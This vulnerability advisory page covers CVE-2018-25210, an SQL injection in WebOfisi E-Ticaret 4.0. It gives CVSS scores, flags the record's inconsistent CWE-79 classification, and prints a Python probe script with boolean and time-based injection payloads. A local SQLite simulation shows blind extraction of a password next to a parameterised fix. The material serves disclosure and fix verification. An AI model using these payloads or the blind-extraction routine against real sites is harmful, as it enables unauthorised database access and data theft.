Security Vulnerability Report
CVE-2018-25210 CVSS 8.2 HIGH


Published: 2026-03-26 12:16:06
Last Modified: 2026-03-27 18:29:35

Description

WebOfisi E-Ticaret 4.0 contains an SQL injection vulnerability in the 'urun' GET parameter of the endpoint that allows unauthenticated attackers to manipulate database queries. Attackers can inject SQL payloads through the 'urun' parameter to execute boolean-based blind, error-based, time-based blind, and stacked query attacks against the backend database.

CVSS Details

The record carries three scores; the page summary uses the first.

CVSS 3.1 (Secondary)
Score: 8.2 HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
Exploitability sub-score 3.9, impact sub-score 4.2

CVSS 4.0 (Secondary)
Score: 8.8 HIGH
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N (trailing not-defined metrics omitted)

CVSS 3.1 (Primary)
Score: 6.1 MEDIUM
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Exploitability sub-score 2.8, impact sub-score 2.7

Note: the two Secondary scores describe an unauthenticated, network-reachable injection with high confidentiality impact, which is what the description says. The Primary 3.1 vector (user interaction required, changed scope, low confidentiality and integrity impact) and the Primary weakness assignment of CWE-79 (cross-site scripting) in the raw record do not describe an SQL injection. Treat the Secondary scores as the ones that reflect the reported flaw and the 6.1/CWE-79 pairing as an inconsistency in the record when triaging.

Configurations (Affected Products)

cpe:2.3:a:web-ofisi:e-ticaret:*:*:*:*:*:*:*:* - VULNERABLE (versionEndIncluding 4.0.0)
WebOfisi E-Ticaret, all versions up to and including 4.0.0; the description and the published exploit name version 4.0 specifically.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL example; replace with the actual vulnerable endpoint
target_url = "http://target.com/vulnerable_page"

# The vulnerable parameter is 'urun'
payloads = [
    "1' AND 1=1-- -",     # Boolean-based: condition true, page should render normally
    "1' AND 1=2-- -",     # Boolean-based: condition false, page should differ
    "1' OR SLEEP(5)-- -",  # Time-based blind (MySQL SLEEP): response delayed by ~5 s
]

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                  "(KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
}

lengths = {}
for payload in payloads:
    params = {"urun": payload}
    try:
        # Send the GET request with the payload in the 'urun' parameter
        response = requests.get(target_url, params=params, headers=headers, timeout=10)
        print(f"Testing payload: {payload}")
        print(f"Status Code: {response.status_code}")
        print(f"Response Length: {len(response.text)}")
        lengths[payload] = len(response.text)
        # Error-based: a database error message leaks into the page.
        # Time-based: SLEEP(5) measurably delays the response (timeout is 10 s).
        if "syntax error" in response.text.lower() or response.elapsed.total_seconds() > 5:
            print("[+] Potential Vulnerability Detected")
        print("-" * 30)
    except requests.RequestException as e:
        print(f"Error: {e}")

# Boolean-based: the true and false conditions should produce different pages.
if payloads[0] in lengths and payloads[1] in lengths and lengths[payloads[0]] != lengths[payloads[1]]:
    print("[+] Boolean-based difference observed between 1=1 and 1=2 responses")
```
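To make the boolean-based blind technique named in the description and exercised by the PoC concrete without touching a live target, the following is an added example; it is not WebOfisi code and not the exploit from the reference. An in-memory SQLite database with constructed product and user tables stands in for the shop, one handler concatenates the urun value into the query text the way the vulnerable endpoint is described to, a second binds it as a parameter, and a blind-extraction routine recovers a secret purely from the true/false difference in whether a product renders. The table and column names (urunler, kullanicilar, ad, fiyat, parola), the admin row and its password are invented for the simulation. SQLite has no SLEEP(), and its execute() refuses a second statement, so the time-based and stacked-query variants are not simulated here.

```python
import sqlite3

# Constructed stand-in for the shop database; the table and column names are invented
# for this simulation and are not WebOfisi E-Ticaret's real schema.
SCHEMA = """
CREATE TABLE urunler (id INTEGER PRIMARY KEY, ad TEXT, fiyat REAL);
CREATE TABLE kullanicilar (id INTEGER PRIMARY KEY, kullanici TEXT, parola TEXT);
INSERT INTO urunler VALUES (1, 'Laptop', 999.0), (2, 'Telefon', 499.0);
INSERT INTO kullanicilar VALUES (1, 'admin', 's3cret!');
"""

# Hypothetical secret to recover: the invented password in the invented users table.
SECRET_QUERY = "SELECT parola FROM kullanicilar WHERE kullanici='admin'"


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def product_page_vulnerable(conn, urun):
    """Vulnerable handler: the 'urun' value is pasted into the SQL text, so a quote and
    a comment sequence in it rewrite the query (the bug class the advisory describes)."""
    sql = f"SELECT ad, fiyat FROM urunler WHERE id = '{urun}'"
    return conn.execute(sql).fetchall()


def product_page_fixed(conn, urun):
    """Hardened handler: 'urun' is bound as a parameter, so whatever it contains is
    compared as one value and can never become SQL syntax."""
    return conn.execute("SELECT ad, fiyat FROM urunler WHERE id = ?", (urun,)).fetchall()


def make_oracle(handler, conn):
    """Boolean oracle over a handler: True when the 'page' still shows product 1,
    i.e. the injected condition evaluated true. That one bit per request is all a
    boolean-based blind attack needs."""
    def oracle(condition):
        payload = f"1' AND ({condition})-- -"
        try:
            return len(handler(conn, payload)) > 0
        except sqlite3.Error:
            return False   # a broken query renders no product, indistinguishable from 'false'
    return oracle


def blind_extract(oracle, subquery, max_len=64):
    """Recover the string returned by `subquery` through yes/no answers only:
    binary-search its length, then binary-search each character's code point."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"length(({subquery})) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    length = lo
    chars = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126   # assumes the secret is printable ASCII
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


def run_demo():
    """Run the same blind extraction against both handlers and report what leaks."""
    conn = open_db()
    return {
        "vulnerable": blind_extract(make_oracle(product_page_vulnerable, conn), SECRET_QUERY),
        "fixed": blind_extract(make_oracle(product_page_fixed, conn), SECRET_QUERY),
    }


if __name__ == "__main__":
    print(run_demo())
```

Against the concatenating handler the oracle answers roughly seven questions per character and the whole secret comes back; against the parameterised handler every probe is compared as a literal product id, no row matches, the oracle answers false to everything and the extraction returns an empty string. That is the check to run when verifying a fix for this class of bug: not "does the 1=1 payload still work", but "does a blind oracle still carry any information".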

References

https://www.exploit-db.com/exploits/45897 (Exploit, Third Party Advisory, VDB Entry)
https://www.vulncheck.com/advisories/webofisi-e-ticaret-sql-injection-via-urun-parameter (Third Party Advisory)
https://www.web-ofisi.com (Product)
https://drive.google.com/file/d/1ZghFSsYto-Vpv3PXunx8xm2g-Gs3HJwz/view?usp=sharing (Broken Link)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2018-25210", "sourceIdentifier": "[email protected]", "published": "2026-03-26T12:16:06.460", "lastModified": "2026-03-27T18:29:35.243", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WebOfisi E-Ticaret 4.0 contains an SQL injection vulnerability in the 'urun' GET parameter of the endpoint that allows unauthenticated attackers to manipulate database queries. Attackers can inject SQL payloads through the 'urun' parameter to execute boolean-based blind, error-based, time-based blind, and stacked query attacks against the backend database."}, {"lang": "es", "value": "WebOfisi E-Ticaret 4.0 contiene una vulnerabilidad de inyección SQL en el parámetro GET 'urun' del endpoint que permite a atacantes no autenticados manipular consultas de la base de datos. Los atacantes pueden inyectar cargas útiles SQL a través del parámetro 'urun' para ejecutar ataques de inyección SQL ciegos basados en booleanos, basados en errores, ciegos basados en tiempo y de consultas apiladas contra la base de datos de backend."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": 
"NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:web-ofisi:e-ticaret:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.0.0", "matchCriteriaId": "D5D70C89-2D66-4888-BF84-D25741E499D0"}]}]}], "references": [{"url": 
"https://drive.google.com/file/d/1ZghFSsYto-Vpv3PXunx8xm2g-Gs3HJwz/view?usp=sharing", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://www.exploit-db.com/exploits/45897", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/webofisi-e-ticaret-sql-injection-via-urun-parameter", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.web-ofisi.com", "source": "[email protected]", "tags": ["Product"]}]}}